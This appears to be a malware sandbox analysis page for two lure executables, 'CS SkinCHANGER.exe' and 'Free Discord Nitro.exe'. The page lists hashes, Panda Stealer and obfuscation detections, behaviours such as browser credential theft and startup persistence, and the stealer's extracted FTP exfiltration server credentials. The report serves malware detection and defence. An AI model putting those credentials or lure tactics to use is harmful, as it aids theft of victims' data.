Overview

overview

10

Static

static

CS SkinCHANGER.exe

windows7_x64

10

CS SkinCHANGER.exe

windows10_x64

10

Free Disco...ro.exe

windows7_x64

10

Free Disco...ro.exe

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    CS SkinCHANGER.rar

  • Size

    963KB

  • Sample

    210520-zvacdvge2x

  • MD5

    92992482ce924b4122ceb658336396a1

  • SHA1

    2f2789e45c5152745feb69a36e18aec7ddecfdb4

  • SHA256

    6284749beb1d6773e265524485d68268c9c90a385b82c229c16123f9839d087f

  • SHA512

    f7c4a91d31f8c7f9ded1372bf81d9516b857effca66d224d026efcc25bc52cba7c628475441df013032fdba046f4f7c6cc608ced92af7a0c3c0422159097b962

Score
10/10
pandastealeragilenetspywarestealer

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    tasty-panel.ug
  • Port:
    21
  • Username:
    user
  • Password:
    IJNJINUJNI345457567234

Targets

    • Target

      CS SkinCHANGER.exe

    • Size

      1016KB

    • MD5

      4baf19886d71c6d9312b3a71dcfea37e

    • SHA1

      ebacfba77117ec07d108f1b80e419be9674a48da

    • SHA256

      1d2005df287958967e785ebc022f183ed7b3878b631d75d61ed8d94bcda0ee58

    • SHA512

      0bb4d418ca83f1f85edcfbea1cf3704d42ebb9e3092c70f0a982238210adc9b51cfa47f19df67f7f2714444f04ac4bbf27887724f1dbcd6d1ba84c872074067c

    Score
    10/10
    pandastealeragilenetspywarestealer

    • PandaStealer

      Panda Stealer is a fork of CollectorProject Stealer written in C++.

      stealerpandastealer

    • Obfuscated with Agile.Net obfuscator

      Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

      agilenet

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

    • Target

      Free Discord Nitro.exe

    • Size

      662KB

    • MD5

      98d08b7942589fe9e468a91f048dcd3d

    • SHA1

      af2950a505dd6e594f6f22305b939d5befafbe6f

    • SHA256

      2d18c676d4c1bbfa2939d36e88d95ece52af4220f0579a15d68642906a42f3c2

    • SHA512

      6672b5b900412a167d1d4e2bfaf4a2d901ed800cdb65f25645d498178839529dfb0de51610e59fb1de867a76fa8a82cdeb11ed4bfc55a4eefd356b510d62f4c5

    Score
    10/10
    agilenet

    • Suspicious use of NtCreateProcessExOtherParentProcess

    • Executes dropped EXE

    • Drops startup file

    • Loads dropped DLL

    • Obfuscated with Agile.Net obfuscator

      Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

      agilenet

    • Legitimate hosting services abused for malware hosting/C2

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

    behavioral3behavioral4

MITRE ATT&CK Enterprise v6

Tasks